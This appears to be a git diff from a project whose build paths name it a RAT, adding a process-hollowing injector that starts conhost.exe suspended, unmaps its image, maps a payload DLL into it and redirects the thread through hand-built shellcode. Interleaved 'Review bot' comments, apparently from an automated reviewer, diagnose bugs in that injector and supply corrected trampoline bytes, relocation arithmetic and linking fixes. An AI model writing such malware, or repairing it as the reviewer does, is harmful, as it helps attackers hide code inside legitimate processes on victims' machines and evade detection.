diff --git a/Debug/FunDLL.exp b/Debug/FunDLL.exp
index 365888f..6f1fe7a 100644
Binary files a/Debug/FunDLL.exp and b/Debug/FunDLL.exp differ
diff --git a/Debug/FunDLL.iobj b/Debug/FunDLL.iobj
deleted file mode 100644
index 18ce4a4..0000000
Binary files a/Debug/FunDLL.iobj and /dev/null differ
diff --git a/Debug/FunDLL.ipdb b/Debug/FunDLL.ipdb
deleted file mode 100644
index 2099e96..0000000
Binary files a/Debug/FunDLL.ipdb and /dev/null differ
diff --git a/Debug/FunDLL.pdb b/Debug/FunDLL.pdb
deleted file mode 100644
index 5df122a..0000000
Binary files a/Debug/FunDLL.pdb and /dev/null differ
diff --git a/Debug/Injector.pdb b/Debug/Injector.pdb
index c69c382..5f5e757 100644
Binary files a/Debug/Injector.pdb and b/Debug/Injector.pdb differ
diff --git a/Debug/Loader.pdb b/Debug/Loader.pdb
index 693e8ed..5191b40 100644
Binary files a/Debug/Loader.pdb and b/Debug/Loader.pdb differ
diff --git a/Dll/Debug/Dll.log b/Dll/Debug/Dll.log
index 5e221a8..9b42e74 100644
--- a/Dll/Debug/Dll.log
+++ b/Dll/Debug/Dll.log
@@ -1,8 +1,5 @@
C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Microsoft\VC\v150\Platforms\Win32\PlatformToolsets\v141_xp\Toolset.targets(39,5): warning MSB8051: Support for targeting Windows XP is deprecated and will not be present in future releases of Visual Studio. Please see https://go.microsoft.com/fwlink/?linkid=2023588 for more information.
C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Microsoft\VC\v150\Microsoft.CppBuild.targets(391,5): warning MSB8028: The intermediate directory (Debug\) contains files shared from another project (Dll.vcxproj). This can lead to incorrect clean and rebuild behavior.
- fundll.cpp
Creating library C:\Users\hellisabove\source\repos\RAT\Debug\FunDLL.lib and object C:\Users\hellisabove\source\repos\RAT\Debug\FunDLL.exp
- Generating code
- All 3 functions were compiled because no usable IPDB/IOBJ from previous compilation was found.
- Finished generating code
- Dll.vcxproj -> C:\Users\hellisabove\source\repos\RAT\Debug\FunDLL.dll
+tools.obj : error LNK2001: unresolved external symbol _NtQueryInformationProcess@20
+C:\Users\hellisabove\source\repos\RAT\Debug\FunDLL.dll : fatal error LNK1120: 1 unresolved externals
diff --git a/Dll/Debug/FunDLL.tlog/CL.command.1.tlog b/Dll/Debug/FunDLL.tlog/CL.command.1.tlog
index 4682923..9059f15 100644
Binary files a/Dll/Debug/FunDLL.tlog/CL.command.1.tlog and b/Dll/Debug/FunDLL.tlog/CL.command.1.tlog differ
diff --git a/Dll/Debug/FunDLL.tlog/CL.read.1.tlog b/Dll/Debug/FunDLL.tlog/CL.read.1.tlog
index 8d47c28..4e617ff 100644
Binary files a/Dll/Debug/FunDLL.tlog/CL.read.1.tlog and b/Dll/Debug/FunDLL.tlog/CL.read.1.tlog differ
diff --git a/Dll/Debug/FunDLL.tlog/CL.write.1.tlog b/Dll/Debug/FunDLL.tlog/CL.write.1.tlog
index 27f4603..bc1eb33 100644
Binary files a/Dll/Debug/FunDLL.tlog/CL.write.1.tlog and b/Dll/Debug/FunDLL.tlog/CL.write.1.tlog differ
diff --git a/Dll/Debug/FunDLL.tlog/FunDLL.write.1u.tlog b/Dll/Debug/FunDLL.tlog/FunDLL.write.1u.tlog
deleted file mode 100644
index b4bb458..0000000
Binary files a/Dll/Debug/FunDLL.tlog/FunDLL.write.1u.tlog and /dev/null differ
diff --git a/Dll/Debug/FunDLL.tlog/link.command.1.tlog b/Dll/Debug/FunDLL.tlog/link.command.1.tlog
index ea9fd82..46b134b 100644
Binary files a/Dll/Debug/FunDLL.tlog/link.command.1.tlog and b/Dll/Debug/FunDLL.tlog/link.command.1.tlog differ
diff --git a/Dll/Debug/FunDLL.tlog/link.read.1.tlog b/Dll/Debug/FunDLL.tlog/link.read.1.tlog
index d66d11c..46b134b 100644
Binary files a/Dll/Debug/FunDLL.tlog/link.read.1.tlog and b/Dll/Debug/FunDLL.tlog/link.read.1.tlog differ
diff --git a/Dll/Debug/FunDLL.tlog/link.write.1.tlog b/Dll/Debug/FunDLL.tlog/link.write.1.tlog
index 1b566d3..46b134b 100644
Binary files a/Dll/Debug/FunDLL.tlog/link.write.1.tlog and b/Dll/Debug/FunDLL.tlog/link.write.1.tlog differ
diff --git a/Dll/Debug/FunDLL.tlog/unsuccessfulbuild b/Dll/Debug/FunDLL.tlog/unsuccessfulbuild
new file mode 100644
index 0000000..e69de29
diff --git a/Dll/Debug/vc141.pdb b/Dll/Debug/vc141.pdb
index 6039950..447dc9b 100644
Binary files a/Dll/Debug/vc141.pdb and b/Dll/Debug/vc141.pdb differ
diff --git a/Dll/Dll.vcxproj b/Dll/Dll.vcxproj
index 439f48f..4b50303 100644
--- a/Dll/Dll.vcxproj
+++ b/Dll/Dll.vcxproj
@@ -140,6 +140,10 @@
+
+
+
+
diff --git a/Dll/Dll.vcxproj.filters b/Dll/Dll.vcxproj.filters
index f9f4109..b7a0834 100644
--- a/Dll/Dll.vcxproj.filters
+++ b/Dll/Dll.vcxproj.filters
@@ -18,5 +18,13 @@
Source Files
+
+ Source Files
+
+
+
+
+ Header Files
+
\ No newline at end of file
diff --git a/Dll/fundll.cpp b/Dll/fundll.cpp
index 2eab02b..ae31cf6 100644
--- a/Dll/fundll.cpp
+++ b/Dll/fundll.cpp
@@ -1,23 +1,42 @@
-#include
+#include "tools.h"
+BOOL was_dllmain_called = FALSE;
+DWORD dll_param;
+
+LPSTR target_path = "C:\\Windows\\System32\\conhost.exe";
+
+extern "C" __declspec(dllexport) void FunEntry() {
+ char dll_path[MAX_PATH];
+ DWORD ret = GetModuleFileNameA((HINSTANCE)dll_param, dll_path, MAX_PATH);
+ char test[1024];
+ wsprintfA(test, "%s", dll_path);
+ MessageBoxA(0, test, "", 0);
+ // inject dll
+ Tools::AutoInject(target_path, dll_path);
+}
BOOL APIENTRY DllMain(HMODULE Base, DWORD Callback, LPVOID Param) {
+ dll_param = (DWORD)Base;
+ was_dllmain_called = TRUE;
+
switch (Callback) {
case DLL_PROCESS_ATTACH:
-
+
break;
case DLL_PROCESS_DETACH:
- break;
- default:
-
break;
}
- return 1;
+ return TRUE;
}
-extern "C" __declspec(dllexport) int FunEntry() {
- char exe[MAX_PATH + 1];
- GetModuleFileNameA(0, exe, sizeof(exe));
- MessageBoxA(0, exe, "I am inside: ", 0);
- return 0;
+extern "C" __declspec(dllexport) void MainBitch() {
+ if (was_dllmain_called) {
+ while (TRUE) {
+ char exe[MAX_PATH + 1];
+ GetModuleFileNameA(0, exe, sizeof(exe));
+ MessageBoxA(0, exe, "I am inside: ", 0);
+ }
+ } else {
+ MessageBoxA(NULL, "DLLMain was not called", NULL, 0);
+ }
}
\ No newline at end of file
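Review bot: `FunEntry` discards the result of `GetModuleFileNameA`, so on failure (0) or truncation (exactly `MAX_PATH`) an empty or partial `dll_path` is handed to `Tools::AutoInject`, which then opens the wrong file; guard it with `if (ret == 0 || ret >= MAX_PATH) return;` and drop the unused `test` copy, which only re-formats the same string. `target_path` is a string literal bound to a non-const `LPSTR` and passed as `CreateProcessA`'s `lpCommandLine`, a parameter the API takes as writable (the W variant is documented to modify it); a writable array `char target_path[] = "C:\\Windows\\System32\\conhost.exe";` removes both the deprecated literal-to-`char*` conversion and any chance of a write into read-only memory. `dll_param = (DWORD)Base` narrows the module handle, which is consistent with the Win32-only injector in tools.cpp but deserves a comment such as `// x86 only: HMODULE narrowed to DWORD for the 32-bit hollowing stub`.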
diff --git a/Dll/tools.cpp b/Dll/tools.cpp
new file mode 100644
index 0000000..c6ad22a
--- /dev/null
+++ b/Dll/tools.cpp
@@ -0,0 +1,162 @@
+#include "tools.h"
+#include
+
+using NtUnmapViewOfSection = NTSTATUS(WINAPI*)(HANDLE, PVOID);
+
+typedef struct BASE_RELOCATION_BLOCK {
+ DWORD PageAddress;
+ DWORD BlockSize;
+} BASE_RELOCATION_BLOCK, *PBASE_RELOCATION_BLOCK;
+
+typedef struct BASE_RELOCATION_ENTRY {
+ USHORT Offset : 12;
+ USHORT Type : 4;
+} BASE_RELOCATION_ENTRY, *PBASE_RELOCATION_ENTRY;
+
+DWORD ConvertVirtualAddressToRawAddress(DWORD virtual_address, LPVOID file) {
+ PIMAGE_DOS_HEADER dos_header = (PIMAGE_DOS_HEADER) file;
+ PIMAGE_SECTION_HEADER section = (PIMAGE_SECTION_HEADER)((DWORD)file + dos_header->e_lfanew + sizeof(IMAGE_NT_HEADERS32));
+
+ while (virtual_address > section->VirtualAddress + section->Misc.VirtualSize)
+ section++;
+
+ DWORD offset = virtual_address - section->VirtualAddress;
+ DWORD raw_address = offset + section->PointerToRawData;
+ return raw_address;
+}
+
+int Tools::AutoInject(LPSTR target, LPCSTR payload) {
+ LPSTARTUPINFOA startup_info = new STARTUPINFOA();
+ LPPROCESS_INFORMATION process_info = new PROCESS_INFORMATION();
+ PROCESS_BASIC_INFORMATION *process_basic_info = new PROCESS_BASIC_INFORMATION();
+
+ BOOL process_created = CreateProcessA(NULL, target, NULL, NULL, TRUE, CREATE_SUSPENDED, NULL, NULL, startup_info, process_info);
+ if (process_created == TRUE) {
+ HANDLE target_process = process_info->hProcess;
+ if (target_process != INVALID_HANDLE_VALUE) {
+ DWORD return_lenght = 0;
+ NtQueryInformationProcess(target_process, ProcessBasicInformation, process_basic_info, sizeof(PROCESS_BASIC_INFORMATION), &return_lenght);
+ DWORD image_base_offset = (DWORD)process_basic_info->PebBaseAddress + 8;
+
+ LPVOID destination_image_base = 0;
+ SIZE_T bytes_read = NULL;
+ BOOL process_read = ReadProcessMemory(target_process, (LPCVOID)image_base_offset, &destination_image_base, 4, &bytes_read);
+
+ if (process_read == TRUE && destination_image_base != ERROR) {
+ HANDLE dll_file = CreateFileA(payload, GENERIC_READ, NULL, NULL, OPEN_ALWAYS, NULL, NULL);
+ if (dll_file != INVALID_HANDLE_VALUE) {
+ DWORD dll_size = GetFileSize(dll_file, NULL);
+ LPDWORD file_bytes_read = 0;
+ LPVOID dll_buffer = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, dll_size);
+ if (dll_buffer != ERROR) {
+ DWORD ss = 0;
+ BOOL dll_read = ReadFile(dll_file, dll_buffer, dll_size, &ss, NULL);
+
+ if (dll_read == TRUE) {
+
+ PIMAGE_DOS_HEADER dll_image_dos_header = (PIMAGE_DOS_HEADER)dll_buffer;
+ PIMAGE_NT_HEADERS dll_image_nt_headers = (PIMAGE_NT_HEADERS)((DWORD)dll_buffer + dll_image_dos_header->e_lfanew);
+ SIZE_T dll_image_size = dll_image_nt_headers->OptionalHeader.SizeOfImage;
+
+ NtUnmapViewOfSection unmap_section = (NtUnmapViewOfSection)GetProcAddress(GetModuleHandleA("ntdll"), "NtUnmapViewOfSection");
+ if (NT_SUCCESS(unmap_section(target_process, destination_image_base))) {
+ LPVOID new_destination_image_base = VirtualAllocEx(target_process, destination_image_base, dll_image_size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
+ destination_image_base = new_destination_image_base;
+
+ DWORD delta_image_base = (DWORD)destination_image_base - dll_image_nt_headers->OptionalHeader.ImageBase;
+
+ dll_image_nt_headers->OptionalHeader.ImageBase = (DWORD)destination_image_base;
+ WriteProcessMemory(target_process, new_destination_image_base, dll_buffer, dll_image_nt_headers->OptionalHeader.SizeOfHeaders, NULL);
+
+ PIMAGE_SECTION_HEADER dll_image_section_header = (PIMAGE_SECTION_HEADER)((DWORD)dll_buffer + dll_image_dos_header->e_lfanew + sizeof(IMAGE_NT_HEADERS32));
+ PIMAGE_SECTION_HEADER old_dll_section_header = dll_image_section_header;
+
+ for (int i = 0; i < dll_image_nt_headers->FileHeader.NumberOfSections; i++) {
+ PVOID destination_section_location = (PVOID)((DWORD)destination_image_base + dll_image_section_header->VirtualAddress);
+ PVOID source_section_location = (PVOID)((DWORD)dll_buffer + dll_image_section_header->PointerToRawData);
+ WriteProcessMemory(target_process, destination_section_location, source_section_location, dll_image_section_header->SizeOfRawData, NULL);
+ dll_image_section_header++;
+ }
+
+ // get FunEntry from exported function address
+ PIMAGE_EXPORT_DIRECTORY image_export_directory = (PIMAGE_EXPORT_DIRECTORY)((DWORD)dll_buffer + ConvertVirtualAddressToRawAddress((DWORD)dll_image_nt_headers->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress, dll_buffer));
+ PDWORD pEAT = (DWORD*)((DWORD)dll_buffer + ConvertVirtualAddressToRawAddress(image_export_directory->AddressOfFunctions, dll_buffer));
+
+ //pEAT[0] - 1st exported function
+ //pEAT[1] - 2nd exported function
+
+ IMAGE_DATA_DIRECTORY relocation_table = dll_image_nt_headers->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC];
+ dll_image_section_header = old_dll_section_header;
+
+ for (int x = 0; x < dll_image_nt_headers->FileHeader.NumberOfSections; x++) {
+ BYTE* reloc_section_name = (BYTE*)".reloc";
+ if (memcmp(dll_image_section_header->Name, reloc_section_name, 5) != 0) {
+ dll_image_section_header++;
+ continue;
+ }
+
+ DWORD source_relocation_table_raw = dll_image_section_header->PointerToRawData;
+ DWORD relocation_offset = 0;
+
+ while (relocation_offset < relocation_table.Size) {
+ PBASE_RELOCATION_BLOCK relocation_block = (PBASE_RELOCATION_BLOCK)((DWORD)dll_buffer + source_relocation_table_raw + relocation_offset);
+ relocation_offset += sizeof(PBASE_RELOCATION_BLOCK);
+ DWORD relocation_counts = (relocation_block->BlockSize - sizeof(BASE_RELOCATION_BLOCK)) / sizeof(BASE_RELOCATION_ENTRY);
+ PBASE_RELOCATION_ENTRY relocation_entries = (PBASE_RELOCATION_ENTRY)((DWORD)dll_buffer + source_relocation_table_raw + relocation_offset);
+
+ for (DWORD a = 0; a < relocation_counts; a++) {
+ relocation_offset += sizeof(BASE_RELOCATION_ENTRY);
+ if (relocation_entries[a].Type == 0)
+ continue;
+
+ DWORD patched_address = relocation_block->PageAddress + relocation_entries[a].Offset;
+ DWORD patched_buffer = 0;
+ DWORD bytes_read = 0;
+
+ ReadProcessMemory(target_process, (LPCVOID)((DWORD)destination_image_base + patched_address), &patched_buffer, sizeof(DWORD), &bytes_read);
+ patched_buffer += delta_image_base;
+ WriteProcessMemory(target_process, (PVOID)((DWORD)destination_image_base + patched_address), &patched_buffer, sizeof(DWORD), file_bytes_read);
+ }
+ }
+ }
+
+ LPCONTEXT context = new CONTEXT();
+ context->ContextFlags = CONTEXT_INTEGER;
+ GetThreadContext(process_info->hThread, context);
+
+ // machine code -> opcodes
+ // code for exec DllMain when injected
+ BYTE code[] = {
+ 0x68, 0xDD, 0xDD, 0xDD, 0xDD, 0xDD,
+ 0x68, 0xDD, 0xDD, 0xDD, 0xDD, 0xDD,
+ 0x68, 0xDD, 0xDD, 0xDD, 0xDD, 0xDD,
+ 0x68, 0xDD, 0xDD, 0xDD, 0xDD, 0xDD,
+ 0xB8, 0xDD, 0xDD, 0xDD, 0xDD, 0xDD,
+ 0xFF, 0xE0 // jmp eax
+ };
+
+ *((PDWORD)(code + 1)) = 0; // 3rd param
+ *((PDWORD)(code + 6)) = 1; // 2nd param
+ *((PDWORD)(code + 11)) = (DWORD)destination_image_base; // 1st param
+ *((PDWORD)(code + 16)) = (DWORD)destination_image_base + pEAT[1];
+ *((PDWORD)(code + 21)) = (DWORD)destination_image_base + dll_image_nt_headers->OptionalHeader.AddressOfEntryPoint;
+
+ LPVOID address_buffer = VirtualAllocEx(target_process, NULL, sizeof(code), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
+ BOOL success = WriteProcessMemory(target_process, address_buffer, code, sizeof(code), NULL);
+
+ if (success == TRUE) {
+ context->Eax = (DWORD)address_buffer;
+ SetThreadContext(process_info->hThread, context);
+ ResumeThread(process_info->hThread);
+ }
+ return 0;
+ }
+ }
+ }
+ }
+ CloseHandle(dll_file);
+ }
+ }
+ CloseHandle(target_process);
+ }
+}
\ No newline at end of file
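Review bot: The trampoline in `code` is laid out with six bytes per `push imm32` / `mov eax, imm32` row, but those encodings are five bytes long and the patch offsets 1/6/11/16/21 assume five: the write at `code + 6` overwrites the second `0x68` opcode and the stray `0xDD` left at `code[5]` is decoded as an x87 instruction, so the resumed thread faults before it reaches `DllMain`. The array should hold five bytes per row (27 bytes total) as below, leaving the immediate patching and the `VirtualAllocEx`/`WriteProcessMemory` of the stub unchanged. Two further defects: `relocation_offset += sizeof(PBASE_RELOCATION_BLOCK)` advances by the size of a pointer (4) instead of the 8-byte block header, so `relocation_entries` lands on each block's `BlockSize` field and every later block drifts — it must be `sizeof(BASE_RELOCATION_BLOCK)`; and `NtQueryInformationProcess` is called directly without `ntdll.lib` (the committed `Dll.log` shows `LNK2001 _NtQueryInformationProcess@20`), so resolve it with `GetProcAddress` as is already done for `NtUnmapViewOfSection`, or add `#pragma comment(lib, "ntdll.lib")`. Also `CreateFileA(payload, GENERIC_READ, NULL, NULL, OPEN_ALWAYS, ...)` creates an empty file when the payload path is wrong and the PE headers are then read from a zero-length buffer, and `AutoInject` falls off the end of a non-`void` function on every path except the resumed one; use `OPEN_EXISTING`, check the `VirtualAllocEx`/`WriteProcessMemory` results, and return a status on every branch (and release the `new`ed structs, `dll_buffer` and `hThread` there too).
```cpp
// 5-byte encodings: push imm32 (0x68) and mov eax, imm32 (0xB8); offsets 1/6/11/16/21 below assume this layout
BYTE code[] = {
    0x68, 0xDD, 0xDD, 0xDD, 0xDD, // push 0           (lpReserved)
    0x68, 0xDD, 0xDD, 0xDD, 0xDD, // push 1           (DLL_PROCESS_ATTACH)
    0x68, 0xDD, 0xDD, 0xDD, 0xDD, // push image base  (hinstDLL)
    0x68, 0xDD, 0xDD, 0xDD, 0xDD, // push return addr (pEAT[1], reached when DllMain's stdcall ret pops the args)
    0xB8, 0xDD, 0xDD, 0xDD, 0xDD, // mov eax, AddressOfEntryPoint
    0xFF, 0xE0                    // jmp eax
};
// … unchanged: patching of the immediates, VirtualAllocEx/WriteProcessMemory of the stub, SetThreadContext/ResumeThread …
```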
diff --git a/Dll/tools.h b/Dll/tools.h
new file mode 100644
index 0000000..8d523cf
--- /dev/null
+++ b/Dll/tools.h
@@ -0,0 +1,7 @@
+#include
+
+#pragma once
+
+namespace Tools {
+ int AutoInject(LPSTR target_process, LPCSTR payload);
+}
\ No newline at end of file
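Review bot: `#pragma once` is placed after the `#include` on the first line; by convention the guard is the first line of the header so a reader (and tooling) sees the include guard before anything else. The declaration names the first parameter `target_process`, while the definition in tools.cpp calls it `target` and hands it to `CreateProcessA` as a command line rather than a process handle; renaming it `target_cmdline` in both places would stop callers from passing a handle. A one-line comment on the declaration is also missing, e.g. `// Spawns target_cmdline suspended and maps the DLL at payload over its image (x86 only); see tools.cpp for the return contract`.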
diff --git a/Injector/Debug/Injector.ilk b/Injector/Debug/Injector.ilk
index 5de5b6b..a761978 100644
Binary files a/Injector/Debug/Injector.ilk and b/Injector/Debug/Injector.ilk differ
diff --git a/Injector/Debug/Injector.tlog/link.read.1.tlog b/Injector/Debug/Injector.tlog/link.read.1.tlog
index 4073d96..e107641 100644
Binary files a/Injector/Debug/Injector.tlog/link.read.1.tlog and b/Injector/Debug/Injector.tlog/link.read.1.tlog differ
diff --git a/Injector/Debug/vc143.idb b/Injector/Debug/vc143.idb
index 71e54e2..d67335b 100644
Binary files a/Injector/Debug/vc143.idb and b/Injector/Debug/vc143.idb differ
diff --git a/Injector/Debug/vc143.pdb b/Injector/Debug/vc143.pdb
index c2807b3..6c5c365 100644
Binary files a/Injector/Debug/vc143.pdb and b/Injector/Debug/vc143.pdb differ
diff --git a/Loader/Debug/Loader.tlog/link.read.1.tlog b/Loader/Debug/Loader.tlog/link.read.1.tlog
index f03f114..4a1d873 100644
Binary files a/Loader/Debug/Loader.tlog/link.read.1.tlog and b/Loader/Debug/Loader.tlog/link.read.1.tlog differ
diff --git a/Loader/Debug/vc141.pdb b/Loader/Debug/vc141.pdb
index 02fe3bb..d45b5fc 100644
Binary files a/Loader/Debug/vc141.pdb and b/Loader/Debug/vc141.pdb differ